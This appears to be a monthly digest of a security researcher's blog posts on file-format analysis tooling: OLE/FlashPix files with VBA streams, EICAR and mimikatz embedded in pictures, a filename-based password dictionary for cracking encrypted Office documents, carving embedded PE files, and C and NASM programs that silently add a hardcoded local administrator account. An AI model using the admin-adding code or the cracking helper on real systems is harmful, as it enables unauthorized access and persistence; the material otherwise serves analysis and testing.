In this video, I use GNU Radio Companion (without SDR) to illustrate the acoustic beat phenomenon.
I mention a 400Hz dial tone in this video, but this will vary by country.
Here is an overview of content I published in March:
Blog posts:
YouTube videos:
Videoblog posts:
SANS ISC Diary entries:
Last year, there was some misunderstanding regarding Office Documents with VBA code mistakenly identified as FlashPix picture files.
The FlashPix picture format is an old format based on the Compound File Binary Format (what I like to call OLE files). It has no support for VBA code at all (it doesn’t support any embedded scripting).
However, since it is an OLE file, it’s technically possible to add storages and streams containing VBA code. This code can never execute, because the FlashPix specification does not support it, and hence there are no image viewers that would recognize and execute this code. Anti-virus engines, on the other hand, do recognize the VBA storage and stream names when they parse the OLE container, which is what this PoC relies on.
So I took a FlashPix image (3d996a887c4a1b5b5ce70528f6bb4508). Here you can see the streams it contains:

And then I took a malicious AutoCAD drawing, and copied the VBA streams and storages into the FlashPix file:

Giving me this file 5040ef90824371a0bd0acaa36263553b. When I submitted this file to VirusTotal a couple of months ago, the AV detection ratio was 29/59, which is far better than the other “AV-alert pictures” that I created.
If you are in need of a benign file that will trigger anti-virus, I shared this FlashPix PoC on the new malware sharing service Malware Bazaar.
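To make the “storages and streams” concrete, here is an added example (not oledump, and not code from this post): it builds a tiny Compound File Binary container in memory, lists its directory entries the way oledump would, and flags the VBA names. The entry names (“CompObj”, “Image Contents”, “VBA”, “_VBA_PROJECT”) are constructed for illustration, the streams are empty, and the walker ignores the directory’s red-black tree and the mini FAT, which is enough for a flat listing.

```python
import struct

# Minimal Compound File Binary (OLE) builder and directory walker: constructed
# example, not Didier Stevens' oledump code.  Sector size is 512 (CFB version 3).
CFB_SIGNATURE = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'
SECTOR_SHIFT = 9
SECTOR_SIZE = 1 << SECTOR_SHIFT
ENDOFCHAIN, FREESECT, FATSECT = 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD
NOSTREAM = 0xFFFFFFFF
TYPE_STORAGE, TYPE_STREAM, TYPE_ROOT = 1, 2, 5
DIR_ENTRY = '<64sHBBIII16sIQQIQ'      # one 128-byte directory entry
HEADER = '<8s16sHHHHH6s9I109I'         # 512-byte header including the in-header DIFAT


def _dir_entry(name, etype, left=NOSTREAM, right=NOSTREAM, child=NOSTREAM):
    raw_name = name.encode('utf-16-le') + b'\x00\x00'   # name length counts the terminator
    return struct.pack(DIR_ENTRY, raw_name, len(raw_name), etype, 1,
                       left, right, child, b'\x00' * 16, 0, 0, 0, ENDOFCHAIN, 0)


def build_sample_cfb(names):
    """Build an OLE file whose root holds the given (name, type) entries.
    Siblings are chained through 'right' links and every stream is empty:
    enough to exercise a directory walker, not a spec-complete writer."""
    entries = [_dir_entry('Root Entry', TYPE_ROOT, child=1)]
    for i, (name, etype) in enumerate(names, start=1):
        right = i + 1 if i < len(names) else NOSTREAM
        entries.append(_dir_entry(name, etype, right=right))
    dir_data = b''.join(entries)
    dir_data += b'\x00' * (-len(dir_data) % SECTOR_SIZE)   # unused entries are all zero (type 0)
    n_dir = len(dir_data) // SECTOR_SIZE
    # sector 0 is the single FAT sector; the directory occupies sectors 1..n_dir
    fat = [FATSECT] + [s + 1 for s in range(1, n_dir)] + [ENDOFCHAIN]
    fat += [FREESECT] * (SECTOR_SIZE // 4 - len(fat))
    difat = [0] + [FREESECT] * 108
    header = struct.pack(HEADER, CFB_SIGNATURE, b'\x00' * 16, 0x3E, 3, 0xFFFE,
                         SECTOR_SHIFT, 6, b'\x00' * 6,
                         0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0, *difat)
    return header + struct.pack('<%dI' % len(fat), *fat) + dir_data


def list_entries(data):
    """Walk the directory sector chain and return [(name, type, size)] for
    every used entry, in on-disk order (a flat listing like oledump's)."""
    if data[:8] != CFB_SIGNATURE:
        raise ValueError('not a Compound File Binary file')
    sector_shift, = struct.unpack_from('<H', data, 30)
    sector_size = 1 << sector_shift
    num_fat, first_dir = struct.unpack_from('<II', data, 44)
    difat = struct.unpack_from('<109I', data, 76)
    # The 109 FAT sectors listed in the header cover files up to roughly 6.8 MB;
    # bigger files chain extra DIFAT sectors, which this walker does not follow.
    fat = []
    for s in difat[:num_fat]:
        fat.extend(struct.unpack_from('<%dI' % (sector_size // 4), data, (s + 1) * sector_size))
    entries, seen, sector = [], set(), first_dir
    while sector != ENDOFCHAIN and sector not in seen:     # 'seen' guards against FAT loops
        seen.add(sector)
        base = (sector + 1) * sector_size
        for i in range(sector_size // 128):
            fields = struct.unpack_from(DIR_ENTRY, data, base + i * 128)
            raw_name, name_len, etype, size = fields[0], fields[1], fields[2], fields[-1]
            if etype == 0:
                continue
            name = raw_name[:max(name_len - 2, 0)].decode('utf-16-le')
            entries.append((name, etype, size & 0xFFFFFFFF))   # v3 files use only the low 32 bits
        sector = fat[sector]
    return entries


VBA_NAMES = {'VBA', '_VBA_PROJECT', 'PROJECT', 'DIR'}   # heuristic: names that belong to a VBA project


def vba_indicators(data):
    """Entry names that only make sense in a VBA project; in a picture file they
    are a red flag for scanners even though no viewer would run the code."""
    return [n for n, _, _ in list_entries(data) if n.upper() in VBA_NAMES]


if __name__ == '__main__':
    # constructed sample: FlashPix-looking entries plus the copied-in VBA names
    sample = build_sample_cfb([('CompObj', TYPE_STREAM), ('Image Contents', TYPE_STORAGE),
                               ('VBA', TYPE_STORAGE), ('_VBA_PROJECT', TYPE_STREAM)])
    for name, etype, size in list_entries(sample):
        print({1: 'storage', 2: 'stream', 5: 'root'}[etype], repr(name), size)
    print('VBA indicators:', vba_indicators(sample))
```

Run against a real FlashPix or Office file, `list_entries` will show the same names oledump prints; for anything but the smallest streams you would need the mini FAT to read their content, which the walker above deliberately leaves out.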
This new version of msoffcrypto-crack.py, a tool to crack encrypted MS Office documents, comes with a new option to generate a password dictionary based on the filename of the document.
Option -p allows the user to provide a dictionary file. Use value #f to generate a dictionary based on the filename: this will generate a dictionary of all possible substrings of the filename.
I had to analyze an encrypted spreadsheet yesterday, and the password was in the name, like this:

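The substring dictionary idea, as an added example (this is not the code of msoffcrypto-crack.py): it takes the file name, strips directory and extension (an assumption; the tool’s exact rule may differ), emits every distinct contiguous substring longest first, and feeds the list to a cracking loop. The `try_password` callback is a stand-in; with msoffcrypto-tool it would wrap `OfficeFile.load_key(password=...)` and `decrypt()`, treating the exception raised for a wrong key as “no”.

```python
import os

# Constructed example of the "-p #f" idea from msoffcrypto-crack.py; not the
# tool's own code.  Assumes directory and extension are dropped and that
# longer candidates (closer to the whole name) are worth trying first.


def filename_substrings(path, min_length=1):
    """All distinct contiguous substrings of the file name stem, longest first."""
    stem = os.path.splitext(os.path.basename(path))[0]
    seen, candidates = set(), []
    for length in range(len(stem), min_length - 1, -1):
        for start in range(len(stem) - length + 1):
            candidate = stem[start:start + length]
            if candidate not in seen:
                seen.add(candidate)
                candidates.append(candidate)
    return candidates


def crack_with_dictionary(candidates, try_password):
    """Return the first candidate accepted by try_password, or None.
    Real use: try_password opens the document with msoffcrypto.OfficeFile,
    calls load_key(password=candidate) and decrypt(), and returns False on
    the exception msoffcrypto raises for a wrong password."""
    for candidate in candidates:
        if try_password(candidate):
            return candidate
    return None


if __name__ == '__main__':
    # constructed file name with the password hidden in it, like the spreadsheet described above
    path = '/cases/Factuur-2020-03-sEcr3t.xlsx'
    words = filename_substrings(path, min_length=4)
    print(len(words), 'candidates, first three:', words[:3])
    # stand-in verifier so the example runs offline; see crack_with_dictionary for the real one
    print('password:', crack_with_dictionary(words, lambda p: p == 'sEcr3t'))
```

A stem of n characters yields at most n(n+1)/2 candidates, so even a long file name is a tiny dictionary; `min_length` just trims the one- and two-character noise.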
msoffcrypto-crack_V0_0_5.zip (https)
MD5: 1514DA367DCFF7051AB117266CE65BD3
SHA256: FEEFDD89134083EA19936494C8FCBD05804B3B9C0D4C5FBAFE06578D466B50AE
I helped a friend create picture files that are detected by anti-virus. They are not malicious: they neither execute code nor trigger a vulnerability.
The EICAR test file is detected by many anti-virus programs, except when it is appended to arbitrary files. This is according to the spec: the EICAR string has to be the first 68 bytes of the file and the file may not be longer than 128 bytes, so a copy appended to a picture is out of scope and scanners are not required to flag it.
Starting with a one-pixel JPEG and PNG file, I append the EICAR test file. And with a JPEG file, I can also insert the EICAR file as a comment (a COM segment, which viewers skip):

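The two JPEG variants above as an added example (not the author’s script): one function appends data after the EOI marker, the other inserts a COM (0xFFFE) segment right after SOI with a correctly computed length field, and a small segment walker verifies the result. The JPEG skeleton is constructed (SOI, a JFIF APP0 segment, EOI, no scan data), and `PAYLOAD` is a placeholder where the real 68-byte EICAR string would go; `eicar_spec_detectable` encodes the offset-0 / 128-byte rule that explains why the appended copies score so low.

```python
import struct

# Constructed example for the JPEG/EICAR PoCs described above; not code from the post.
SOI, EOI, COM, APP0, SOS = b'\xFF\xD8', b'\xFF\xD9', b'\xFF\xFE', b'\xFF\xE0', b'\xFF\xDA'
# Placeholder for the 68-byte EICAR string (substitute the real one when building the PoC).
PAYLOAD = b'EICAR-TEST-STRING-PLACEHOLDER'


def minimal_jpeg():
    """Constructed JPEG skeleton: SOI, a JFIF APP0 segment, EOI.  No scan data,
    because only the marker/segment structure matters for this example."""
    jfif = b'JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00'
    return SOI + APP0 + struct.pack('>H', len(jfif) + 2) + jfif + EOI


def insert_comment(jpeg, comment):
    """Insert a COM segment right after SOI.  The 16-bit length counts the two
    length bytes plus the data, but not the marker itself."""
    if not jpeg.startswith(SOI) or len(comment) + 2 > 0xFFFF:
        raise ValueError('not a JPEG, or comment too long for one segment')
    return SOI + COM + struct.pack('>H', len(comment) + 2) + comment + jpeg[2:]


def append_trailer(jpeg, payload):
    """Append data after EOI; decoders stop at EOI, so the image still renders."""
    return jpeg + payload


def segments(jpeg):
    """Walk marker segments from SOI up to SOS or EOI; return [(marker, data)]."""
    out, pos = [], 2
    while pos + 2 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos:pos + 2]
        if marker == EOI:
            out.append((marker, b''))
            break
        length, = struct.unpack_from('>H', jpeg, pos + 2)
        out.append((marker, jpeg[pos + 4:pos + 2 + length]))
        if marker == SOS:           # entropy-coded data follows; stop walking
            break
        pos += 2 + length
    return out


def eicar_spec_detectable(data):
    """Per the EICAR spec, detection is only required when the string starts at
    offset 0 and the whole file is at most 128 bytes."""
    return data.startswith(PAYLOAD) and len(data) <= 128


if __name__ == '__main__':
    base = minimal_jpeg()
    for label, variant in (('comment', insert_comment(base, PAYLOAD)),
                           ('trailer', append_trailer(base, PAYLOAD))):
        print(label, [m.hex() for m, _ in segments(variant)],
              'spec-detectable:', eicar_spec_detectable(variant))
```

Both variants keep a valid image in front of the payload; the difference is only where the scanner has to look, and neither is a position the EICAR spec obliges it to check.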
The detection scores on VirusTotal show that these files are not detected by many anti-virus programs:
That wasn’t good enough for my friend, she needed something with a higher detection score.
For several years now, there has been a Windows program that triggers many anti-virus programs: mimikatz.
When I embed mimikatz in picture files the same way, I get better detection scores than for the EICAR test file (as I expected):

And I have a picture file with even higher detection scores, but you’ll have to wait until April Fools day for the details 😉 .
This new version of oledump comes with an update to plugin_biff by @JohnLaTwC to improve formula parsing.
oledump_V0_0_49.zip (https)
MD5: 1EF0B466A80C034F10770F8A235EBE7B
SHA256: BD8CAD9EDB99B6063A9A36B8B83EB3416484CEC244A01CA2F08BB032402FF147
Windows domain controllers have no local accounts. I think I learned this back when I made my “Practice ntds.dit File Overview” series of blog posts.
Today I had to search for a Microsoft document covering this: Built-in and Account Domains.
I added a feature to my tool pecheck.py to help extract embedded PE files from any host file: -l --locate.
pecheck.py expects a PE file as input, but if you use option -l P, it will read any file and look for embedded PE files by searching for a DOS header (MZ) followed by a PE header that can then be parsed by pefile without errors.
Like in this example, where I created a PNG file with a 32-bit and a 64-bit DLL appended:

One PE file can then be selected for further analysis:

Or for extraction:

Here is a video with more details:
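The locate logic as an added example (not pecheck.py itself, and without pefile): it finds every “MZ”, follows e_lfanew to a “PE\0\0” signature, keeps the hit only when the COFF machine type and optional-header magic are sane (an approximation of “pefile parses it without errors”), reports 32/64-bit and EXE/DLL, and carves a hit out of the host. The host file is constructed: a PNG-looking prefix containing a decoy “MZ” in text, followed by a 32-bit and a 64-bit DLL header stub that is not a loadable image.

```python
import struct

# Locate PE files embedded in an arbitrary host file, in the spirit of
# "pecheck.py -l P": constructed example, not pecheck.py's own code.
MACHINES = {0x014C: 'x86', 0x8664: 'x64', 0x01C4: 'armv7', 0xAA64: 'arm64'}
IMAGE_FILE_DLL = 0x2000


def locate_pe(data):
    """Return a dict per 'MZ' that leads, via e_lfanew at offset 0x3C, to a
    'PE\\0\\0' signature with a known machine type and PE32/PE32+ magic."""
    hits, pos = [], data.find(b'MZ')
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew, = struct.unpack_from('<I', data, pos + 0x3C)
            pe = pos + e_lfanew
            if e_lfanew >= 0x40 and pe + 26 <= len(data) and data[pe:pe + 4] == b'PE\x00\x00':
                machine, nsections, _, _, _, _, chars = struct.unpack_from('<HHIIIHH', data, pe + 4)
                magic, = struct.unpack_from('<H', data, pe + 24)
                if machine in MACHINES and magic in (0x10B, 0x20B) and 0 < nsections <= 96:
                    hits.append({'offset': pos, 'machine': MACHINES[machine],
                                 'bits': 64 if magic == 0x20B else 32,
                                 'dll': bool(chars & IMAGE_FILE_DLL)})
        pos = data.find(b'MZ', pos + 1)
    return hits


def carve(data, hits, index):
    """Cut one located PE out of the host: from its MZ up to the next hit or
    end of file.  Approximation; a precise carve would use the section table."""
    start = hits[index]['offset']
    end = hits[index + 1]['offset'] if index + 1 < len(hits) else len(data)
    return data[start:end]


def fake_pe_header(machine, is_dll=True):
    """Constructed stub: just the headers the checks above look at, not a loadable image."""
    dos = b'MZ' + b'\x00' * 58 + struct.pack('<I', 0x40)            # e_lfanew = 0x40
    magic = 0x20B if machine in (0x8664, 0xAA64) else 0x10B
    coff = struct.pack('<HHIIIHH', machine, 3, 0, 0, 0,
                       0xE0 if magic == 0x10B else 0xF0,             # SizeOfOptionalHeader
                       0x0002 | (IMAGE_FILE_DLL if is_dll else 0))   # EXECUTABLE_IMAGE [| DLL]
    return dos + b'PE\x00\x00' + coff + struct.pack('<H', magic) + b'\x00' * 30


def build_sample_host():
    """PNG-looking prefix with a decoy 'MZ' inside a text chunk, then a 32-bit
    and a 64-bit DLL stub appended, like the PNG described above (constructed)."""
    png = (b'\x89PNG\r\n\x1a\n' + b'\x00\x00\x00\x0dIHDR' + b'\x00' * 17
           + b'tEXtMZ is just text\x00')
    return png + fake_pe_header(0x014C) + fake_pe_header(0x8664)


if __name__ == '__main__':
    host = build_sample_host()
    hits = locate_pe(host)
    for n, hit in enumerate(hits, 1):
        print(n, hit)
    print(len(carve(host, hits, 0)), 'bytes carved for hit 1')
```

The decoy “MZ” is rejected because the dword at its offset 0x3C does not point at a PE signature; that single check already removes most false positives in binary data, and the machine/magic checks catch the rest.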
To start: there is no version 2014 of Microsoft Office.
That’s why I was intrigued when I saw User Agent String “Microsoft Office Excel 2014” appearing in Wireshark when I did some tests with Excel’s data importing features.
With Excel 2019, when I get data from a CSV file and provide a URL (instead of a local filename) like this:


Excel will issue several OPTIONS and HEAD requests, with different User Agent Strings:

And finally, a GET request to download the file:

Xavier Mertens has mentioned User Agent String “Microsoft Office Excel 2014” in another context: “Microsoft Apps Diverted from Their Main Use”.
A friend asked me for a small program to add a new local user to a Windows system and make that user member of the Administrators group (CTF anyone? 😉 ).
I could find a program in my repository, but it was a very old program using system commands.
#include <stdio.h>
#include <windows.h>

/* Old approach: shell out to net.exe twice. It works, but it spawns cmd.exe
   and the password ends up on a visible command line. */
int main(int argc, char* argv[])
{
    system("net user hack knock /add");                 /* create local user "hack" with password "knock" */
    system("net localgroup administrators hack /add");  /* add it to the local Administrators group */
    return 0;
}
; Assembly code to add a new local user and make it member of Administrators group
; Written for NASM assembler (http://www.nasm.us) by Didier Stevens
; https://DidierStevens.com
; Use at your own risk
;
; Build:
; nasm -f win32 add-admin.asm
; Microsoft linker:
; link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib
; https://blog.didierstevens.com/2018/11/26/quickpost-compiling-with-build-tools-for-visual-studio-2017/
; /fixed -> no relocation section
; /debug:none /EMITPOGOPHASEINFO -> https://stackoverflow.com/questions/45538668/remove-image-debug-directory-from-rdata-section
; /filealign:256 -> smaller, but no valid exe
; MinGW linker:
; ld -L /c/msys64/mingw32/i686-w64-mingw32/lib --strip-all add-admin.obj -l netapi32 -l kernel32
;
; History:
; 2020/03/13
; 2020/03/14 refactor
; 2020/03/15 refactor

BITS 32

%define USERNAME 'hacker'
%define PASSWORD 'P@ssw0rd'
%define ADMINISTRATORS 'administrators'

global _main

extern _NetUserAdd@16
extern _NetLocalGroupAddMembers@20
extern _ExitProcess@4

struc USER_INFO_1
    .uName       RESD 1
    .Password    RESD 1
    .PasswordAge RESD 1
    .Privilege   RESD 1
    .HomeDir     RESD 1
    .Comment     RESD 1
    .Flags       RESD 1
    .ScriptPath  RESD 1
endstruc

struc LOCALGROUP_MEMBERS_INFO_3
    .lgrmi3_domainandname RESD 1
endstruc

USER_PRIV_USER EQU 1
UF_SCRIPT      EQU 1

section .text

_main:
    mov ebp, esp
    sub esp, 4

    ; NetUserAdd(NULL, level=1, buffer, NULL)
    lea eax, [ebp-4]
    push eax
    push UI1
    push 1
    push 0
    call _NetUserAdd@16

    ; NetLocalGroupAddMembers(NULL, administrators, level=3, buffer, 1)
    push 1
    push LMI3
    push 3
    push ADMINISTRATORS_UNICODE
    push 0
    call _NetLocalGroupAddMembers@20

    ; ExitProcess(0)
    push 0
    call _ExitProcess@4

; uncomment next line to put data structure in .data section (increases size PE file because of extra .data section)
; section .data

UI1:
    istruc USER_INFO_1
        at USER_INFO_1.uName,       dd USERNAME_UNICODE
        at USER_INFO_1.Password,    dd PASSWORD_UNICODE
        at USER_INFO_1.PasswordAge, dd 0
        at USER_INFO_1.Privilege,   dd USER_PRIV_USER
        at USER_INFO_1.HomeDir,     dd 0
        at USER_INFO_1.Comment,     dd 0
        at USER_INFO_1.Flags,       dd UF_SCRIPT
        at USER_INFO_1.ScriptPath,  dd 0
    iend

USERNAME_UNICODE:
    db __utf16le__(USERNAME), 0, 0
PASSWORD_UNICODE:
    db __utf16le__(PASSWORD), 0, 0
ADMINISTRATORS_UNICODE:
    db __utf16le__(ADMINISTRATORS), 0, 0

LMI3:
    istruc LOCALGROUP_MEMBERS_INFO_3
        at LOCALGROUP_MEMBERS_INFO_3.lgrmi3_domainandname, dd USERNAME_UNICODE
    iend
To create the executable, you need to assemble and link this assembly code (this is not shellcode, just assembling is not enough).
Assembling is done with nasm (-f win32 to create a 32-bit object file):
nasm -f win32 add-admin.asm
Linking can be done with Microsoft’s linker (see Quickpost: Compiling with Build Tools for Visual Studio 2017) or MinGW’s linker.
MS:
link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib
I use /fixed to prevent the creation of a relocation section, which would make the EXE larger (the image then has to be loaded at its preferred base address; for a tiny tool like this that is an acceptable trade-off).
MinGW:
ld -L /c/msys64/mingw32/i686-w64-mingw32/lib --strip-all add-admin.obj -l netapi32 -l kernel32
In both cases, the EXE is 1536 bytes long.